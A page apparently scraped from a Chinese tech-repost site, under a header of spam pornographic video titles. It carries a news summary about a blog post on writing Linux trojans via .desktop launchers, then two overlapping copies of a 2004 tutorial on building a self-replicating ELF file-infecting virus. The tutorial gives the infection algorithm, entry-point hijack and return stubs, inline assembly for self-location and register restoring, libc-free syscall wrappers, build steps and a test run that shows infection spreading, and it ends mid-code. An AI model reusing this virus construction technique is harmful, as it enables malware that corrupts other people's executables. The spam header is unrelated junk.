久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

Linux安全编程

發布時間:2025/4/14 linux 20 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Linux安全编程 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

如何編寫一個Linux病毒


?
? ? ? ? ?每個人都知道Linux沒有病毒,或者類似的東西。有人進而推論認為Linux對病毒之類的東西是免疫的,因為它設計的太棒了,Macs也是如此。其實這種觀點是錯誤的。


? ? ? ? ?名為foobar的博客者在Geekzone中發表了一篇名為“5個步驟寫出一個Linux病毒”的文章,文章雖然名義上是寫如何制造Linux病毒的,實際卻是告訴讀者現實世界中病毒是如何工作的以及Linux是多么的脆弱。


? ? ? ? ?而且foobar文章的難點不在于如何在Linux上寫出攻擊性代碼,更重要的是如何感染其他Linux操作系統電腦。實際上,foobar的病毒攻擊基本上也就是特洛伊木馬攻擊,而且foobar明確指出特洛伊木馬攻擊是Windows病毒的常用模式。


? ? ? ? ?有人指出foobar的攻擊并非嚴格意義上針對Linux的,而是GNOME或者KDE或者其他更高端軟件,這也的確是事實。實際上這給用戶提供了防范信息:許多人的電腦運行Linux,也便會有許多電腦運行GNOME或者KDE,攻擊后兩者便是攻擊Linux。當初對Windows的攻擊不也是先從攻擊Office、Flash和Acrobat等軟件開始的嗎?


? ? ? ? ?Foobar采用在e-mail中添加附件來傳播病毒(當然郵件的標題要有吸引力來誘使用戶點擊),這種方式也不甚妥當。因為Windows上的e-mail程序會去除那些可執行的附件,而且Webmail服務器有AV殺毒瀏覽,所以現在經常采用的方式是在e-mail中附加web鏈接來傳播病毒。在這一點上,Windows和Linux沒有太大的不同。


? ? ? ? ?很重要的一點是如何讓病毒在Linux上執行,這也是一個難點。在Windows中,用戶一旦下載了文件并運行,只有執行許可(execute permissions)運行了他才可以執行文件。Windows有執行許可(execute permissions),但默認它們是開的。而foobar采用的方法與此類似:KDE 和GNOME有個叫做“launchers”的設備(其文件名的末尾是".desktop"),它可以不需要執行許可的詳細設置就執行一個單獨的命令。這是一個長久以來就存在的問題,也是foobar利用的Linux的主要弱點(應該說是KDE 和GNOME的主要弱點)。


? ? ? ? ?Foobar博客的核心內容對我們而言并不陌生,但由此我們可以看到Windows上的病毒之所以多,并不是因為操作系統自身對病毒更友好,而是一些漏洞。而且幾乎每一種阻止病毒在Linux上發展的東西都采用在了Vista SP1中。


? ? ? ? ?用戶如何應對呢?foobar建議不要點擊Linux上不明的附件,當然在Windows中還不要點擊web鏈接。而且他個人建議解決KDE 和GNOME中.desktop的漏洞。我懷疑這會遭來強烈的反對,因為作為終端用戶系統這大大降低了可用性和讀取性。


? ? ? ? ?Foobar博客還揭示了其他問題:有許多特權提升(privilege elevation)的漏洞在各種需要本地讀取的Linux中,如果用戶沒有升級完全(Windows用戶也需要警惕這一點),foobar的病毒就會獲取你的本地讀取,同時攻擊決定利用哪一個特權提升(privilege elevation)bug。很多Linux用戶不知道如何升級漏洞補丁來阻擋特權進程(如Samba),從而將漏洞暴露給了黑客。


剖析Linux病毒原型工作過程和關鍵環節

  一、 介紹
  
  寫這篇文章的目的主要是對最近寫的一個Linux病毒原型代碼做一個總結,同時向對這方面有興趣的朋友做一個簡單的介紹。閱讀這篇文章你需要一些知識,要對ELF有所了解、能夠閱讀一些嵌入了匯編的C代碼、了解病毒的基本工作原理。
  
  二、 ELF Infector (ELF文件感染器)
  
  為了制作病毒文件,我們需要一個ELF文件感染器,用于制造第一個帶毒文件。對于ELF文件感染技術,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》一文中已經有了一個非常好的分析、描述,在這方面我還沒有發現可以對其進行補充的地方,因此在這里我把Silvio Cesare對ELF Infection過程的總結貼出來,以供參考:
  
  The final algorithm is using this information is.
  * Increase p_shoff by PAGE_SIZE in the ELF header
  * Patch the insertion code (parasite) to jump to the entry point
  (original)
  * Locate the text segment program header
  * Modify the entry point of the ELF header to point to the new
  code (p_vaddr + p_filesz)
  * Increase p_filesz by account for the new code (parasite)
  * Increase p_memsz to account for the new code (parasite)
  * For each phdr who's segment is after the insertion (text segment)
  * increase p_offset by PAGE_SIZE
  * For the last shdr in the text segment
  * increase sh_len by the parasite length
  * For each shdr who's section resides after the insertion
  * Increase sh_offset by PAGE_SIZE
  * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
  the file - text segment p_offset + p_filesz (original)
  
  在Linux病毒原型中所使用的gei - ELF Infector即是根據這個原理寫的。在附錄中你可以看到這個感染工具的源代碼: g-elf-infector.cg-elf-infector與病毒是獨立開的,其只在制作第一個病毒文件時被使用。我簡單介紹一下它的使用方法,g-elf-infector.c可以被用于任何希望--將二進制代碼插入到指定文件的文本段,并在目標文件執行時首先被執行--的用途上。g-elf-infector.c的接口很簡單,你只需要提供以下三個定義:
  
  * 存放你的二進制代碼返回地址的地址,這里需要的是這個地址與代碼起始地址的偏移,用于返回到目標程序的正常入口
  
  #define PARACODE_RETADDR_ADDR_OFFSET 1232
  
  * 要插入的二進制代碼(由于用C編寫,所以這里需要以一個函數的方式提供)
  void parasite_code(void);
  
  * 二進制代碼的結束(為了易用,這里用一個結尾函數來進行代碼長度計算)
  void parasite_code_end(void);
  
  parasite_code_end應該是parasite_code函數后的第一個函數定義,通常應該如下表示
  void parasite_code(void)
  {
  ...
  ...
  ...
  }
  void parasite_code_end(void) {}
  
  在這里存在一個問題,就是編譯有可能在編譯時將parasite_code_end放在parasite_code地址的前面,這樣會導致計算代碼長度時失敗,為了避免這個問題,你可以這樣做
  void parasite_code(void)
  {
  ...
  ...
  ...
  }
  void parasite_code_end(void) {parasite_code();}
  
  有了這三個定義,g-elf-infector就能正確編譯,編譯后即可用來ELF文件感染
  
  face=Verdana>
  
  三、病毒原型的工作過程
  
  1 首先通過ELF Infector將病毒代碼感染到一個ELF文件,這樣就創造了第一個帶毒文件,后續的傳播就由它來完成。
  
  2 當帶毒文件被執行時,會首先跳到病毒代碼開始執行。
  
  3 病毒代碼開始發作,在這個原型里,病毒會直接開始傳播。
  
  4 病毒遍歷當前目錄下的每一個文件,如果是符合條件的ELF文件就開始感染。
  
  5 病毒的感染過程和ELF Infector的過程類似,但由于工作環境的不同,代碼的實現也是有較大區別的。
  
  6 目前傳染對ELF文件的基本要求是文本段要有剩余空間能夠容納病毒代碼,如果無法滿足,病毒會忽略此ELF。對于被感染過一次的ELF文件,文本段將不會有剩余的空間,因此二次感染是不會發生的。
  
  7 病毒代碼執行過后,會恢復堆棧和所有寄存器(這很重要),然后跳回到真正的可執行文件入口,開始正常的運行過程。
  
  上面對病毒原型的工作過程的介紹也許顯得千篇一律了,和我們早就熟知的關于病毒的一些介紹沒有什么區別?是的,的確是這樣,原理都是類似的,關鍵是要看實現。下面我們就將通過對一些技術問題的分析來了解具體的實現思路。
  
  四、關鍵技術問題及處理
  
  1 ELF文件執行流程重定向和代碼插入
  
  在ELF文件感染的問題上,ELF Infector與病毒傳播時調用的infect_virus思路是一樣的:
  
  * 定位到文本段,將病毒的代碼接到文本段的尾部。這個過程的關鍵是要熟悉ELF文件的格式,將病毒代碼復制到文本段尾部后,能夠根據需要調整文本段長度改變所影響到的后續段(segment)或節(section)的虛擬地址。同時注意把新引入的文本段部分與一個.setion建立關聯,防止strip這樣的工具將插入的代碼去除。還有一點就是要注意文本段增加長度的對齊問題,見ELF文檔中的描述:
  p_align
  As ``Program Loading'' later in this part describes, loadable
  process segments must have congruent values for p_vaddr and
  p_offset, modulo the page size.
  
  * 通過過將ELF文件頭中的入口地址修改為病毒代碼地址來完成代碼重定向:
  /* Modify the entry point of the ELF */
  org_entry = ehdr->e_entry;
  ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
  
  2 病毒代碼如何返回到真正的ELF文件入口
  
  方法技巧應該很多,這里采用的方法是PUSH+RET組合:
  
  __asm__ volatile (
  ...
  "return:\n\t"
  "push $0xAABBCCDD\n\t" /* push ret_addr */
  "ret\n"
  ::);
  
  其中0xAABBCCDD處存放的是真正的程序入口地址,這個值在插入病毒代碼時由感染程序來填寫。
  
  五、 新編譯環境下的調試方法
  
  grip2@linux:~/tmp/virus> ls
  g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h
  
  調整Makefile文件,將編譯模式改為調試模式,即關掉-DNDEBUG選項
  grip2@linux:~/tmp/virus> cat Makefile
  all: foo gei
  gei: g-elf-infector.c gvirus.o
  gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
  foo: foo.c
  gcc $< -o foo
  gvirus.o: gvirus.c
  gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
  clean:
  rm *.o -rf
  rm foo -rf
  rm gei -rf
  
  編譯代碼
  grip2@linux:~/tmp/virus> make
  gcc foo.c -o foo
  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
  
  先獲取病毒代碼長度,然后調整gvirus.c中的#define PARACODE_LENGTH定義
  grip2@linux:~/tmp/virus>. /gei -l <.這里獲取病毒代碼的長度
  Parasite code length: 1744
  
  獲取病毒代碼開始位置和0xaabbccdd的地址,計算存放返回地址的地址的偏移
  grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
  8049427: 68 dd cc bb aa push $0xaabbccdd
  grip2@linux:~/tmp/virus> objdump -d gei|grep ""
  08048d80 :
  8049450: e9 2b f9 ff ff jmp 8048d80
  grip2@linux:~/tmp/virus> objdump -d gei|grep ":"
  08048d80 :
  
  0x8049427與0x8048d80相減即獲得我們需要的偏移,用這個值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值
  
  重新編譯
  grip2@linux:~/tmp/virus> make clean
  rm *.o -rf
  rm foo -rf
  rm gei -rf
  grip2@linux:~/tmp/virus> make
  gcc foo.c -o foo
  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
  
  grip2@linux:~/tmp/virus> ls
  gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
  g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h
  
  建立一個測試目錄,測試一下
  grip2@linux:~/tmp/virus> mkdir test
  grip2@linux:~/tmp/virus> cp gei foo test
  grip2@linux:~/tmp/virus> cd test
  grip2@linux:~/tmp/virus/test> ls
  gei foo
  grip2@linux:~/tmp/virus/test> cp foo h
  
  制作帶毒程序
  grip2@linux:~/tmp/virus/test>. /gei h
  file size: 8668
  e_phoff: 00000034
  e_shoff: 00001134
  e_phentsize: 00000020
  e_phnum: 00000008
  e_shentsize: 00000028
  e_shnum: 00000025
  text segment file offset: 0
  [15 sections patched]
  grip2@linux:~/tmp/virus/test> ll
  total 44
  -rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
  
  運行帶毒程序
  grip2@linux:~/tmp/virus/test>. /h
  .
  ..
  gei
  foo
  h
  .backup.h
  real elf point
  grip2@linux:~/tmp/virus/test> ll
  total 52
  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
  
  測試上面帶毒程序運行后,是否感染了其他ELF程序
  grip2@linux:~/tmp/virus/test>. /foo
  .
  ..
  gei
  Better luck next file
  foo
  h
  Better luck next file
  .backup.h
  Better luck next file
  real elf point
  
  OK,成功
  grip2@linux:~/tmp/virus/test> cp. ./foo hh
  grip2@linux:~/tmp/virus/test> ll
  total 64
  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
  
  grip2@linux:~/tmp/virus/test>. /foo
  .
  ..
  gei
  Better luck next file
  foo
  h
  Better luck next file
  .backup.h
  Better luck next file
  hh
  real elf point
  grip2@linux:~/tmp/virus/test>
  
  六、總結
  
  由于我既不是一個virus coder也不是一個anti-viruscoder,所以對病毒技術的掌握應該是有欠缺的。如果在文章中對病毒技術的描述不夠準確,分析不夠到位,還請指正,謝謝。


?一個Linux病毒原型分析

分類: LINUX
作者:grip2?
日期:2004/12/12




內容:
? ? 1 -- 介紹
? ? 2 -- ELF Infector (ELF文件感染器)
? ? 3 -- 病毒原型的工作過程
? ? 4 -- 關鍵技術問題及處理
? ? 5 -- 在一個新的編譯環境下的調試方法
? ? 6 -- 最后
? ? 7 -- 參考文獻
? ? 8 -- 附錄 - ELF文件感染工具和病毒原型源代碼




?一、 ** 介紹 ? ? ? ? ? ?
?
? ? 寫這篇文章的目的主要是對最近寫的一個Linux病毒原型代碼做一個總結,
同時向對這方面有興趣的朋友做一個簡單的介紹。
? ?
? ? 閱讀這篇文章你需要一些知識,要對ELF有所了解、能夠閱讀一些嵌入
了匯編的C代碼、了解病毒的基本工作原理。
[separator]


二、 ** ELF Infector (ELF文件感染器)


? ? 為了制作病毒文件,我們需要一個ELF文件感染器,用于制造第一個帶毒文件。


? ? 對于ELF文件感染技術,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》
一文中已經有了一個非常好的分析、描述,在這方面我還沒有發現可以對其進行補充的
地方,因此在這里我把Silvio Cesare對ELF Infection過程的總結貼出來,以供參考:
? ?
? ? The final algorithm is using this information is.
? ? * Increase p_shoff by PAGE_SIZE in the ELF header
? ? * Patch the insertion code (parasite) to jump to the entry point
? ? ? (original)
? ? * Locate the text segment program header
? ? ? ? * Modify the entry point of the ELF header to point to the new
? ? ? ? ? code (p_vaddr + p_filesz)
? ? ? ? * Increase p_filesz by account for the new code (parasite)
? ? ? ? * Increase p_memsz to account for the new code (parasite)
? ? * For each phdr who's segment is after the insertion (text segment)
? ? ? ? * increase p_offset by PAGE_SIZE
? ? * For the last shdr in the text segment
? ? ? ? * increase sh_len by the parasite length
? ? * For each shdr who's section resides after the insertion
? ? ? ? * Increase sh_offset by PAGE_SIZE
? ? * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
? ? ? the file - text segment p_offset + p_filesz (original)
? ? ?
在Linux病毒原型中所使用的gei - ELF Infector即是根據這個原理寫的。在
附錄中你可以看到這個感染工具的源代碼: g-elf-infector.c


g-elf-infector與病毒是獨立開的,其只在制作第一個病毒文件時被使用。我簡單介
紹一下它的使用方法,g-elf-infector.c可以被用于任何希望--將二進制代碼插入到
指定文件的文本段,并在目標文件執行時首先被執行--的用途上。g-elf-infector.c
的接口很簡單,你只需要提供以下三個定義:


? ? * 存放你的二進制代碼返回地址的地址,這里需要的是這個地址與代碼起始
? ? 地址的偏移,用于返回到目標程序的正常入口
? ? ? ? #define PARACODE_RETADDR_ADDR_OFFSET 1232 ??
? ? ? ?
? ? * 要插入的二進制代碼(由于用C編寫,所以這里需要以一個函數的方式提供)
? ? ? ? void parasite_code(void);
? ? ? ?
? ? * 二進制代碼的結束(為了易用,這里用一個結尾函數來進行代碼長度計算)
? ? ? ? void parasite_code_end(void);


parasite_code_end應該是parasite_code函數后的第一個函數定義,通常應該如下表示
? ? void parasite_code(void)
? ? {
? ? ? ? ...
? ? ? ? ...
? ? ? ? ...
? ? }
? ? void parasite_code_end(void) {}


在這里存在一個問題,就是編譯有可能在編譯時將parasite_code_end放在parasite_code
地址的前面,這樣會導致計算代碼長度時失敗,為了避免這個問題,你可以這樣做
? ? void parasite_code(void)
? ? {
? ? ? ? ...
? ? ? ? ...
? ? ? ? ...
? ? }
? ? void parasite_code_end(void) {parasite_code();}


有了這三個定義,g-elf-infector就能正確編譯,編譯后即可用來ELF文件感染
~grip2@linux> ./gei foo




三、** 病毒原型的工作過程


? ? 1 首先通過ELF Infector將病毒代碼感染到一個ELF文件,這樣就創造了第一
個帶毒文件,后續的傳播就由它來完成。
? ? 2 當帶毒文件被執行時,會首先跳到病毒代碼開始執行。
? ? 3 病毒代碼開始發作,在這個原型里,病毒會直接開始傳播。
? ? 4 病毒遍歷當前目錄下的每一個文件,如果是符合條件的ELF文件就開始感染。
? ? 5 病毒的感染過程和ELF Infector的過程類似,但由于工作環境的不同,
代碼的實現也是有較大區別的。
? ? 6 目前傳染對ELF文件的基本要求是文本段要有剩余空間能夠容納病毒代碼,
如果無法滿足,病毒會忽略此ELF。對于被感染過一次的ELF文件,文本段將不會有
剩余的空間,因此二次感染是不會發生的。
? ? 7 病毒代碼執行過后,會恢復堆棧和所有寄存器(這很重要),然后跳回到
真正的可執行文件入口,開始正常的運行過程。


上面對病毒原型的工作過程的介紹也許顯得千篇一律了,和我們早就熟知的
關于病毒的一些介紹沒有什么區別?是的,的確是這樣,原理都是類似的,關鍵是要看
實現。下面我們就將通過對一些技術問題的分析來了解具體的實現思路。
? ?
? ?
四、** 關鍵技術問題及處理


1 ELF文件執行流程重定向和代碼插入


在ELF文件感染的問題上,ELF Infector與病毒傳播時調用的infect_virus思路是一樣的:


? ? * 定位到文本段,將病毒的代碼接到文本段的尾部。這個過程的關鍵是要熟悉
ELF文件的格式,將病毒代碼復制到文本段尾部后,能夠根據需要調整文本段長度改變
所影響到的后續段(segment)或節(section)的虛擬地址。同時注意把新引入的文本段部
分與一個.setion建立關聯,防止strip這樣的工具將插入的代碼去除。還有一點就是要
注意文本段增加長度的對齊問題,見ELF文檔中的描述:
? ? ? ? p_align
? ? ? ? ? As ``Program Loading'' later in this part describes, loadable
? ? ? ? ? process segments must have congruent values for p_vaddr and
? ? ? ? ? p_offset, modulo the page size.


? ? * 通過過將ELF文件頭中的入口地址修改為病毒代碼地址來完成代碼重定向:
? ? /* Modify the entry point of the ELF */
? ? org_entry = ehdr->e_entry;
? ? ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
? ?
2 病毒代碼如何返回到真正的ELF文件入口


方法技巧應該很多,這里采用的方法是PUSH+RET組合:
__asm__ volatile (
? ? ...
? ? "return:\n\t"
? ? "push $0xAABBCCDD\n\t" /* push ret_addr */
? ? "ret\n"
::);
其中0xAABBCCDD處存放的是真正的程序入口地址,這個值在插入病毒代碼時由感染程
序來填寫。


3 堆棧和寄存器的恢復


病毒代碼必須保證運行前、后的堆棧和寄存器內容完全相同,這通過增加額外的代碼
來完成。
在進入時:
? ? __asm__ volatile (
? ? ? ? "push %%eax\n\t"
? ? ? ? "push %%ecx\n\t"
? ? ? ? "push %%edx\n\t"
? ? ? ? ::);
退出時:
? ? __asm__ volatile (
? ? ? ? "popl %%edx\n\t"
? ? ? ? "popl %%ecx\n\t"
? ? ? ? "popl %%eax\n\t"
? ? ? ? "addl $0x102c, %%esp\n\t"
? ? ? ? "popl %%ebx\n\t"
? ? ? ? "popl %%esi\n\t"
? ? ? ? "popl %%edi\n\t"
? ? ? ? "popl %%ebp\n\t"
? ? ? ? "jmp return\n"


要注意上面的代碼是根據特定的編譯器、編譯選項來調整的,在不同的環境下如果重
新編譯病毒程序,可能還需要做一些調整。


4 字符串的使用


write(1, "hello world\n", 12);
在病毒代碼中這樣對一個字符串直接引用是不可以的。這是對字符串的使用是一個絕
對地址引用,病毒代碼在進入到一個新的宿主內后,這一絕對地址的內容是無法得到
保證的,因此在病毒代碼內應該使用相對地址或間接地址進行字符串訪問。
下面是Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》中的一個解決辦法,利用
了緩沖區溢出中shellcode的編寫技術:
In x86 Linux, some syscalls require the use of an absolute address pointing to
initialized data. ?This can be made relocatable by using a common trick used
in buffer overflow code.


? ? jmp ? ?A
B:
? ? pop %eax ? ?; %eax now has the address of the string
? ? . ? ? ? ?; continue as usual
? ? .
? ? .


A:
? ? call B
.string \"hello\"
By making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.


但是在編寫這個linux病毒原型代碼時,我并沒有使用這個方法,我盡力使代碼使用
C語言的語法:
? ? char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};


#ifndef NDEBUG
? ? char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
? ? ? ? ? ? 's','u','p','p','o','r','t','e','d','\n','\0'};
? ? char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
? ? ? ? ? ? 'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif


在這里將字符串以字符數組的形式出現,編譯之后的代碼是這樣:
? ? ...
? ? ? ? movb ? ?$47, -8312(%ebp)
? ? ? ? movb ? ?$116, -8311(%ebp)
? ? ? ? movb ? ?$109, -8310(%ebp)
? ? ? ? movb ? ?$112, -8309(%ebp)
? ? ? ? movb ? ?$47, -8308(%ebp)
? ? ? ? movb ? ?$46, -8307(%ebp)
? ? ? ? movb ? ?$103, -8306(%ebp)
? ? ? ? movb ? ?$118, -8305(%ebp)
? ? ? ? movb ? ?$105, -8304(%ebp)
? ? ? ? movb ? ?$114, -8303(%ebp)
? ? ? ? movb ? ?$117, -8302(%ebp)
? ? ? ? movb ? ?$115, -8301(%ebp)
? ? ? ? ...
這樣帶來一個負面影響就是增加了代碼長度,但是適當的使用對代碼長度影響并不大。
值得注意的一點是,當字符數組定義的尺寸超過了64時,在我的編譯環境下,編譯器
對代碼進行了優化,會導致編譯后代碼成為:
...
.section ? ? ? ?.rodata
.LC0:
? ? ? ? .byte ? 47
? ? ? ? .byte ? 116
? ? ? ? .byte ? 109
? ? ? ? .byte ? 112
? ? ? ? .byte ? 47
? ? ? ? .byte ? 46
? ? ? ? .byte ? 103
? ? ? ? .byte ? 118
? ? ? ? .byte ? 105
? ? ? ? .byte ? 114
? ? ? ? .byte ? 117
? ? ? ? .byte ? 115
? ? ? ? .byte ? 0
...
數據被放到了.rodata section中,這樣就使得其無法隨病毒代碼一起進入宿主,會
造成訪問失敗,所以注意數組的申請盡量保持32以內,防止編譯器優化。


除此之外,使用整型數組的方法也與此類似,不再贅述。


5 遭遇gcc-3.3的bug


gvirus.c中有一部分的數據初始化是這樣的:
? ? ...
? ? char curdir[2] = {'.', 0};
? ? char newline = '\n';


? ? curdir[0] = '.';
? ? curdir[1] = 0;
? ? newline = '\n';


? ? if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
? ? ? ? goto out;
? ? ...
? ? ? ?
也許你會奇怪,為什么curdir和newline在已經初始化后還要重新賦值,這其中的原因
是為了繞過一個gcc的bug。
在我的編譯環境下,當只做
? ? char curdir[2] = {'.', 0};
? ? char newline = '\n';
這樣的初始化時,反匯編代碼如下:
...
0x08048cb0 : ? push ? %ebp
0x08048cb1 : ? push ? %edi
0x08048cb2 : ? push ? %esi
0x08048cb3 : ? push ? %ebx
0x08048cb4 : ? sub ? ?$0x20bc,%esp
0x08048cba : ?push ? %eax
0x08048cbb : ?push ? %ecx
0x08048cbc : ?push ? %edx
0x08048cbd : ?xor ? ?%ecx,%ecx
0x08048cbf : ?lea ? ?0x4e(%esp),%ebx ? ?<-- 使用curdir
0x08048cc3 : ?mov ? ?$0x5,%eax
0x08048cc8 : ?mov ? ?%ecx,%edx
0x08048cca : ?int ? ?$0x80 ? ? ? ?<-- g_open系統調用
0x08048ccc : ?mov ? ?%eax,0x38(%esp)
0x08048cd0 : ?cmp ? ?$0xffffff82,%eax
0x08048cd3 : ?jbe ? ?0x8048cdd?
0x08048cd5 : ?movl ? $0xffffffff,0x38(%esp)
0x08048cdd : ?mov ? ?0x38(%esp),%eax
0x08048ce1 : ?test ? %eax,%eax
0x08048ce3 : ?js ? ? 0x804915d?
0x08048ce9 : ?movw ? $0x2e,0x4e(%esp) ? ?<-- curdir的初始化
...
從注釋可以看出,在這種情況下,curdir的初始化被放到了g_open使用其做參數之后。


當加入
? ? curdir[0] = '.';
? ? curdir[1] = 0;
? ? newline = '\n';
后,反匯編代碼如下:
...
0x08048cb0 : ? push ? %ebp
0x08048cb1 : ? push ? %edi
0x08048cb2 : ? push ? %esi
0x08048cb3 : ? push ? %ebx
0x08048cb4 : ? sub ? ?$0x20bc,%esp
0x08048cba : ?push ? %eax
0x08048cbb : ?push ? %ecx
0x08048cbc : ?push ? %edx
0x08048cbd : ?xor ? ?%ecx,%ecx
0x08048cbf : ?movw ? $0x2e,0x4e(%esp) ? ?<-- curdir的初始化
0x08048cc6 : ?lea ? ?0x4e(%esp),%ebx ? ?<-- 作為參數使用
0x08048cca : ?mov ? ?$0x5,%eax
0x08048ccf : ?mov ? ?%ecx,%edx
0x08048cd1 : ?int ? ?$0x80 ? ? ? ?<-- g_open系統調用
...
從注釋可以看出,加入了這段代碼后,程序編譯正確,避免了這個編譯器bug。


6 通過C語言和inline保證病毒代碼的可讀性和可移植性


用匯編寫病毒代碼的一個缺點就是 - 可讀性和可移植性差,這也是使用匯編語言寫
程序的一個普遍的缺點。
在這個linux病毒原型代碼了主體使用的都是C語言,只有極少部分由于C語言本身的
限制而不得不使用gcc嵌入匯編。對于C語言部分,也盡量是用inline函數,保證代碼
層次分明,保證可讀性。


7 病毒代碼復制時如何獲得自己的起始地址?


雖然,病毒代碼部分向ELF Infector提供了代碼的起始地址,保證了生成第一個帶毒
文件時能夠找到代碼并插入到目標文件內。但是作為進入宿主內部的代碼在進行傳播
時卻無法使用這個地址,因為它的代碼位置已經受到了宿主的影響,這時它需要重新
定位自己的起始位置。


在寫這個病毒原型時,我并沒有參考過其它病毒的代碼,因此這里采用的也許并
不是一個最好的方法:


? ? /* Get start address of virus code */
? ? __asm__ volatile (
? ? ? ? "jmp get_start_addr\n"
? ? "infect_start:\n\t"
? ? ? ? "popl %0\n\t"
? ? ? ? :"=m" (para_code_start_addr)
? ? ? ? :);
? ? para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
? ?
? ? ... /* c代碼 */
? ? ...
? ?
? ? __asm__ volatile (
? ? ? ? ...
? ? ? ? "get_start_addr:\n\t"
? ? ? ? "call infect_start\n"
? ? "return:\n\t"
? ? ? ? "push $0xAABBCCDD\n\t" /* push ret_addr */
? ? ? ? "ret\n"
? ? ? ? ::);
? ? ? ?
通過緩沖區溢出中的一個技巧,jmp/call組合來得到push $0xAABBCCDD指令的地址。
這個地址是0xAABBCCDD地址向后一個push指令,而0xAABBCCDD的地址就是那個用于
存放病毒代碼返回地址的地址,這個地址相對于病毒代碼起始地址的偏移我們是知道
的,就是病毒代碼函數向ELF Infector接口提供的那個宏定義的值:
? ? #ifndef NDEBUG
? ? #define PARACODE_RETADDR_ADDR_OFFSET 1704
? ? #else
? ? #define PARACODE_RETADDR_ADDR_OFFSET 1232
? ? #endif


這樣病毒代碼在當前宿主中的位置就可以得到了(注意從匯編指令出來后,
para_code_start_addr中存放的是0xAABBCCDD的地址,我們減去偏移再減
一個push指令的長度,就是病毒代碼的起始地址):


? ? para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;




8 拋棄C庫


由于病毒代碼要能在不同的ELF文件內容工作,所以我們必須要保證所有的相關函數
調用在病毒體內即可完成。而對C庫的使用將使我們很難做到這一點,即使有的C庫函
數是可以完全內聯的(完全內聯就是說,這個函數本身可以內聯,同時其內部沒有向
外的函數調用),但是隨著編譯環境的不同,這點也是不能得到根本保證的,因此我
們有必要選擇拋棄C庫。


沒有了C庫,我們使用到的一些函數調用就必須重新實現。在這個Linux病毒原型中有
兩種情況,一種是系統調用,另一種是普通的函數。


對于系統調用,我們采用了重新包裝的方法:
? ? static inline
? ? g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
? ? static inline
? ? g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
? ? static inline
? ? g_syscall3(int, open, const char *, file, int, flag, int, mode);
? ? static inline
? ? g_syscall1(int, close, int, fd);
? ? static inline
? ? g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
? ? ? ? ? ?int, flags, int, fd, off_t, offset);
? ? static inline
? ? g_syscall2(int, munmap, void *, addr, size_t, len);
? ? static inline
? ? g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
? ? static inline
? ? g_syscall2(int, fstat, int, filedes, struct stat *, buf);
? ?
并且修改了syscall包裝的宏定義,如
? ? #define g__syscall_return(type, res) \
? ? do { \
? ? ? ? if ((unsigned long)(res) >= (unsigned long)(-125)) { \
? ? ? ? ? ? res = -1; \
? ? ? ? } \
? ? ? ? return (type) (res); \
? ? } while (0)


? ? #define g_syscall0(type,name) \
? ? type g_##name(void) \
? ? { \
? ? long __res; \
? ? __asm__ volatile ("int $0x80" \
? ? ? ? : "=a" (__res) \
? ? ? ? : "0" (__NR_##name)); \
? ? g__syscall_return(type,__res); \
? ? } ??
? ?
對于普通的函數,直接復制一份函數定義:
static inline void * __memcpy(void * to, const void * from, size_t n)
{
? ? int d0, d1, d2;
? ? __asm__ __volatile__(
? ? ? ? "rep ; movsl\n\t"
? ? ? ? "testb $2,%b4\n\t"
? ? ? ? "je 1f\n\t"
? ? ? ? "movsw\n"
? ? ? ? "1:\ttestb $1,%b4\n\t"
? ? ? ? "je 2f\n\t"
? ? ? ? "movsb\n"
? ? ? ? "2:"
? ? ? ? : "=&c" (d0), "=&D" (d1), "=&S" (d2)
